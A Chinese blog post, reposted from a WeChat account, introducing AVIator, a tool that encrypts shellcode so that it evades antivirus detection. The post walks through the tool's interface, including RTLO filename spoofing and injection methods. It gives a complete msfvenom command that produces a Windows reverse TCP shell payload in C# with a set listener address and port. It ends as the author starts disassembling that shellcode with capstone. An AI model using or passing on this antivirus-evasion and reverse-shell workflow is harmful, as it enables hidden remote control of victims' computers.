本文转载自【微信公众号:MicroPest,ID:gh_696c36c5382b】
从文章的受欢迎程度来看,大多数人还是喜欢工具类的,也可以理解,谁不想短平快一点呢。这里就介绍一个工具,对shellcode混淆的工具AvIator。
据文章作者说,用它混淆过后可以过很多种杀软,效果非常得好;
地址:https://github.com/Ch0pin/AVIator,在这里提供了编译好的x64和x86的EXE程序。
程序界面如上图,左右两栏式;
左边是软件的操作步骤;
右边是软件的操作内容,从上到下依次为:AES加密钥、IV初始化向量、Payload代码、加密按钮、加密后的Payload代码、待生成的程序名(是否使用RTLO方式)、目标的OS、五种注入方式。
使用生成Payload,即shellcode;在kali里,msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp,因为程序是C#开发的,所以这里生成的是csharp的;
我们来看看这个msfvenom生成的shellcode的汇编模样,用python来看,先生成python的shellcode:
在python转换前,先要安装个库:
apt-get install python-capstone